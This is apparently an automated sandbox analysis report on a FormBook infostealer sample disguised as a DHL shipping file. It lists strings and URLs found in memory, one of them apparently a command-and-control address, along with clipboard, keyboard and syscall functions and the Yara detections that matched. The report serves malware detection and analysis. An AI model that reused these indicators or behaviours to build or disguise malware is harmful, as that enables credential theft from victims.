            Source: netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000004.00000002.4525505296.00000000049D2000.00000004.10000000.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000004.00000002.4525505296.00000000049D2000.00000004.10000000.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000004.00000002.4523547041.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=0
            Source: netbtugc.exe, 00000004.00000002.4523547041.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000004.00000002.4523547041.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000004.00000002.4523547041.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000004.00000002.4523547041.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000004.00000002.4523547041.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000004.00000002.4523547041.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000004.00000003.2406687140.0000000007F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000004.00000002.4525505296.000000000501A000.00000004.10000000.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.0000000003F9A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?UT5tTdKX=mxnR
            Source: netbtugc.exe, 00000004.00000003.2410213037.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000004.00000002.4527522560.0000000006510000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4525505296.00000000046AE000.00000004.10000000.00040000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.000000000362E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: MPhqOtiHUlL.exe, 00000006.00000002.4524926192.000000000362E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0089EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0089EAFF
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0089ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0089ED6A
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0089EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0089EAFF
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0088AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0088AA57
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008B9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_008B9576

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4523238196.0000000002C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4524618858.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2226323346.0000000003710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4526783594.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2225605698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4524568253.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4524627388.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2227031882.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4523238196.0000000002C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4524618858.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2226323346.0000000003710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4526783594.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2225605698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4524568253.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4524627388.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2227031882.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: DHL 0737-12182024.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: DHL 0737-12182024.exe, 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b96be659-0
            Source: DHL 0737-12182024.exe, 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_b5181c95-c
            Source: DHL 0737-12182024.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ce8dbb58-0
            Source: DHL 0737-12182024.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7892a7ef-c
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042B363 NtClose,2_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B60 NtClose,LdrInitializeThunk,2_2_03972B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03972DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03972C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039735C0 NtCreateMutant,LdrInitializeThunk,2_2_039735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974340 NtSetContextThread,2_2_03974340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974650 NtSuspendThread,2_2_03974650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B80 NtQueryInformationFile,2_2_03972B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BA0 NtEnumerateValueKey,2_2_03972BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BF0 NtAllocateVirtualMemory,2_2_03972BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BE0 NtQueryValueKey,2_2_03972BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AB0 NtWaitForSingleObject,2_2_03972AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AD0 NtReadFile,2_2_03972AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AF0 NtWriteFile,2_2_03972AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F90 NtProtectVirtualMemory,2_2_03972F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FB0 NtResumeThread,2_2_03972FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FA0 NtQuerySection,2_2_03972FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FE0 NtCreateFile,2_2_03972FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F30 NtCreateSection,2_2_03972F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F60 NtCreateProcessEx,2_2_03972F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E80 NtReadVirtualMemory,2_2_03972E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EA0 NtAdjustPrivilegesToken,2_2_03972EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EE0 NtQueueApcThread,2_2_03972EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E30 NtWriteVirtualMemory,2_2_03972E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DB0 NtEnumerateKey,2_2_03972DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DD0 NtDelayExecution,2_2_03972DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D10 NtMapViewOfSection,2_2_03972D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D00 NtSetInformationFile,2_2_03972D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D30 NtUnmapViewOfSection,2_2_03972D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CA0 NtQueryInformationToken,2_2_03972CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CC0 NtQueryVirtualMemory,2_2_03972CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CF0 NtOpenProcess,2_2_03972CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C00 NtQueryInformationProcess,2_2_03972C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C60 NtCreateKey,2_2_03972C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973090 NtSetValueKey,2_2_03973090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973010 NtOpenDirectoryObject,2_2_03973010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039739B0 NtGetContextThread,2_2_039739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D10 NtOpenProcessToken,2_2_03973D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D70 NtOpenThread,2_2_03973D70
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0088D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0088D5EB
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00881201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00881201
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0088E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0088E8F6
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008920460_2_00892046
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008280600_2_00828060
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008882980_2_00888298
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0085E4FF0_2_0085E4FF
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0085676B0_2_0085676B
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008B48730_2_008B4873
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0084CAA00_2_0084CAA0
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0082CAF00_2_0082CAF0
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0083CC390_2_0083CC39
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00856DD90_2_00856DD9
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008291C00_2_008291C0
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0083B1190_2_0083B119
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008413940_2_00841394
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008417060_2_00841706
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0084781B0_2_0084781B
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008419B00_2_008419B0
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008279200_2_00827920
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0083997D0_2_0083997D
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00847A4A0_2_00847A4A
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00847CA70_2_00847CA7
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00841C770_2_00841C77
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00859EEE0_2_00859EEE
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008ABE440_2_008ABE44
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00841F320_2_00841F32
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00B652900_2_00B65290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168712_2_00416871
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168732_2_00416873
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028A02_2_004028A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101732_2_00410173
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011102_2_00401110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1F32_2_0040E1F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012902_2_00401290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004035002_2_00403500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040268A2_2_0040268A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026982_2_00402698
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026A02_2_004026A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF4A2_2_0040FF4A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D7532_2_0042D753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF532_2_0040FF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A003E62_2_03A003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F02_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA3522_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C02C02_2_039C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E02742_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A001AA2_2_03A001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F81CC2_2_039F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA1182_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039301002_2_03930100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C81582_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D20002_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C02_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039647502_2_03964750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039407702_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C6E02_2_0395C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A005912_2_03A00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039405352_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EE4F62_2_039EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E44202_2_039E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F24462_2_039F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F6BD72_2_039F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB402_2_039FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA802_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0A9A62_2_03A0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A02_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039569622_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039268B82_2_039268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E8F02_2_0396E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394A8402_2_0394A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039428402_2_03942840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BEFA02_2_039BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932FC82_2_03932FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394CFE02_2_0394CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960F302_2_03960F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E2F302_2_039E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03982F282_2_03982F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4F402_2_039B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952E902_2_03952E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FCE932_2_039FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEEDB2_2_039FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEE262_2_039FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940E592_2_03940E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03958DBF2_2_03958DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393ADE02_2_0393ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DCD1F2_2_039DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394AD002_2_0394AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0CB52_2_039E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930CF22_2_03930CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940C002_2_03940C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0398739A2_2_0398739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F132D2_2_039F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392D34C2_2_0392D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039452A02_2_039452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B2C02_2_0395B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E12ED2_2_039E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394B1B02_2_0394B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0B16B2_2_03A0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392F1722_2_0392F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397516C2_2_0397516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EF0CC2_2_039EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039470C02_2_039470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F70E92_2_039F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF0E02_2_039FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF7B02_2_039FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F16CC2_2_039F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DD5B02_2_039DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F75712_2_039F7571
